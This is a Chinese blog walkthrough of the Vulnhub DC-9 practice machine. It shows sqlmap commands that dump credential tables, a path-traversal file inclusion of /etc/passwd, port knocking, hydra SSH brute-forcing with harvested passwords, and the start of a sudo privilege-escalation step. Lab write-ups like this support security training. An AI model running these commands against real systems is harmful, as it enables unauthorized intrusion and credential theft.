看完这篇 教你玩转渗透测试靶机vulnhub——DC9_dc9靶机渗透测试知乎

于 2024-08-29 10:30:52 发布
阅读量193 收藏 2
点赞数 6
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57259945/article/details/141672402
版权

发现search 存在输入框 猜测存在sql注入 直接使用sqlmap 工具跑一下
在这里插入图片描述

sqlmap -u "http://172.16.5.117/results.php" --datb "search=1" -dbs #列出数据库

在这里插入图片描述

sqlmap -u "http://172.16.5.117/results.php" --data "search=1" -D users --tables ## 列出表

在这里插入图片描述

sqlmap -u "http://172.16.5.117/results.php" --data "search=1" -D users -T UserDetails --dump  #列出管理员账号密码

在这里插入图片描述
这里获取到了一些 信息 然后在跑一下 Staff 这个库

sqlmap -u "http://172.16.5.117/results.php" --data "search=1" -D Staff --tables  ##列出表

在这里插入图片描述

sqlmap -u "http://172.16.5.117/results.php" --data "search=1" -D Staff -T Users --dump #获取账号密码

在这里插入图片描述
账号密码:admintransorbital1 然后进行登入 发现登入成功!!!
在这里插入图片描述

③:文件包含:

有个提示:File does not exist 显示文件不存在 通过测试 发现 可能是文件包含漏洞发现这里得用户和刚刚数据库里的用户有些一样的

http://172.16.5.117/welcome.php?file=../../../../etc/passwd

在这里插入图片描述

④:端口敲门:

什么是端口敲门?:https://zhuanlan.zhihu.com/p/59488488

knockd 服务的默认配置路径:/etc/knockd.conf

然后使用文件包含漏洞遍历一下获取到了 敲门的密码可以这样理解 sequence = 7469,8475,9842
在这里插入图片描述
先安装 knockd服务: apt-get install knockd 然后进入配置文件进行编辑 vim /etc/knockd.conf
在这里插入图片描述
使用命令:knock 172.16.5.117 7469 8475 9842
在这里插入图片描述
发现 ssh 端口的状态是 open 打开(好像还可以用ncnmap 大家可以尝试)

⑤:hydra爆破SSH账户:

把刚刚sqlmap跑出来的账号和密码 新建两个字典 分别为usernamepasswd
在这里插入图片描述在这里插入图片描述
使用命令:hydra -L username.txt -P passwd.txt ssh://172.16.5.108
在这里插入图片描述
发现了三个用户分别是 joeyt Passw0rdjanitor Ilovepeepeechandlerb UrAG0d

使用命令:ssh joeyt@172.16.5.108 (这里ip自动获取了不用在意一样的)等三个用户都进行登入看看有没有什么隐藏的信息
在这里插入图片描述
最终在janitor 用户中 发现了一个隐藏文件.secrets-for-putin

查看获取到了一些新的用户密码信息 把刚刚获取的信息再次放入 刚刚的psswd.txt字典 再次进行爆破。
在这里插入图片描述在这里插入图片描述使用命令再次爆破:hydra -L username.txt -P passwd.txt ssh://172.16.5.108
发现一个新的用户: fredf /B4-Tru3-001 尝试登入,发现登入成功!!
在这里插入图片描述在这里插入图片描述

⑥:本地提权
sudo -l #列出权限

在这里插入图片描述进行查看发现test 是一个python 文件
在这里插入图片描述使用命令:find / -name test.py 2>/dev/null 查找python文件 进行查看
在这里插入图片描述大概的就是将参数1的内容写到参数2中然后生成一个用户

使用命令:openssl passwd -1 -salt admin 123456 创建一个admin的账号

v_648374
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
一道关于php文件包含的CTF题
m0_62903168的博客
08-27 1724
这是index.php的页面。点击login后会发现url里多了action的参数,那么我们就可以通过它来获取源码。?再通过base64的解码可以查看源码。
Android 应用中广播权限未指定风险与解决方案
weixin_37600397的博客
08-23 1566
Android应用中,广播(Broadcast)是一种重要的通信机制,应用可以通过广播与系统或其他应用进行通信。然而,如果在发送广播时未指定接收者的权限,可能会导致应用暴露于安全风险之下。未授权的接收者可能会拦截这些广播,甚至可能执行恶意操作。 在安全检查中,发现了一个问题:应用存在“Receiver权限未指定风险”。这个问题主要涉及广播发送时未指定接收者权限,可能导致广播被未授权的应用接收,进而可能造成数据泄露或其他安全问题。
upload-labs(Pass-18 ~ Pass-21)
m0_64849639的博客
08-23 1036
所以我们只要上传的文件后缀不是白名单中的,该文件就还是会被删除2、思路:由于该文件后缀不是白名单中的,该文件就还是会被删除;但是,服务器删除该php文件是有一定的延迟的,若我们在这延迟中访问了该php代码,那么就会在当前目录生成shell.php文件3、实践:(1)、抓包进入爆破模块:(2)发包:此时就在源源不断的上传文件1.php,服务器也在一直删除该文件;
Android 关于设备定屏/黑屏/冻屏/ANR那些事
sinat_37429535的博客
08-23 1052
再去上报至WMS进行窗口状态的切换,避免主Surface绘制成上报至WMS后、同时SurfaceView迟迟没有绘制成使得startingWindow过早移除从而产生黑屏的现象.主要作用为提供ViewRootImpl与SurfaceView(假如窗口存在SurfaceView的情况下)同步服务,实现在主Surface与SurfaceView均成绘制时,现象分析:桌面的状态时黑屏的,但是SystemUI的statusBar是显示和功能都是正常的,那一般就是当前app的问题了.
Android中apk安装过程源码解析
k663514387的博客
08-25 1472
android apk安装流程源码解析
Android调整进程的oom_adj
zoujin6649的博客
08-22 684
LinuxKernel中的OOM Killer,内核所管理的进程都有一个衡量其oom权重的值,存储在/proc/<PID>/oom_adj中。比如oom_score分数越低的进程,被杀死的概率越小,或者说被杀死的时间越晚。对于某些非常重要的应用程序,我们不希望它们被系统杀死,一个最简单的方法就是在它的AndroidManifest.xml文件中给“application”标签添加“android:persistent=true”属性。Android系统也为此开发了一个专门的驱动,名为。
[Android常见View的用法] RecyleView基本用法
studyForMokey的博客
08-25 713
RecycleView基本写法
安卓中 onClick(View v) 方法在主线程还是子线程运行
qq_33386162的博客
08-23 412
方法内执行了耗时的操作(如网络请求、大量数据处理等),这可能会导致主线程阻塞,进而影响用户体验(如界面卡顿、无响应等)。为了避免这种情况,你应该将这些耗时的操作放在子线程中执行,然后通过Handler或其他机制将结果传回主线程来更新UI。这个方法是在用户与界面元素(如按钮)进行交互时,由系统框架自动调用的。由于Android的UI操作必须是线程安全的,并且只能在主线程上进行,因此任何与UI相关的回调(包括。方法模拟了一个耗时的操作,我们通过在子线程中调用它来避免阻塞主线程。来处理跨线程的消息传递,因为。
Android 消息机制Handler全解析(一)
dmk877的专栏
08-25 1026
Handler是Android消息机制的上层接口,这使得在开发过程中只需要和Handler交互即可。Handler的使用过程很简单,通过它可以轻松地将一个任务切换到Handler所在的线程去执行。很多人认为Handler的作用是更新UI,这的确没错,但是更新UI仅仅是Handler的一个特殊使用场景。
UE4中的 USE_ANDROID_JNI 宏
sinat_23135151的博客
08-23 477
在引擎代码中看到上面的宏定义,其中USE_ANDROID_JNI表示的是是否使用安卓JNI。而上一篇文章介绍了为什么在打包安卓时,会包含这个文件。
Android Init Language
今天也是星期五的博客
08-26 873
Android Init Language 安卓初始化语言,是一种用于配置和管理 Android 系统服务的专用脚本语言。主要用于编写 .rc 文件(比如我们熟知的init.rc文件),这些文件在系统启动时由进程读取和执行,从而设置和启动系统服务、管理权限、定义设备节点等。
Android13--移除最近任务长按图标弹出菜单
最新发布
Micheal_Yang's Blog
08-28 206
最近在改Android13最近任务的一些功能,其中一个需求是把长按图标弹出菜单的功能屏蔽掉。在平板上,会去调用showTaskMenuWithContainer方法,弹出菜单。如果想不显示这个菜单,直接不调用这个方法就行了,直接访问true。最近任务里面每一个任务对应的是一个TaskView。
Android 11.0 关于定制自适应AdaptiveIconDrawable类型的动态时钟图标的功能实现系列一
安卓兼职framework和app工程师的博客
08-23 160
在11.0的系统rom定制化开发中,在关于定制动态时钟图标中,原系统是不支持动态时钟图标的功能,所以就需要从新 定制动态时钟图标关于自适应AdaptiveIconDrawable类型的样式,就是可以支持当改变系统图标样式变化时,动态时钟 图标的背景图形也跟着改变,所以接下来就来实现相关的功能
记录一次Android11系统证书安装失败
qunimaode的博客
08-23 484
从设置里面安装证书,提示报错。一种是只有公钥的证书,系统提示需要私钥。一种是带私钥的证书,系统反复提示输入密码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值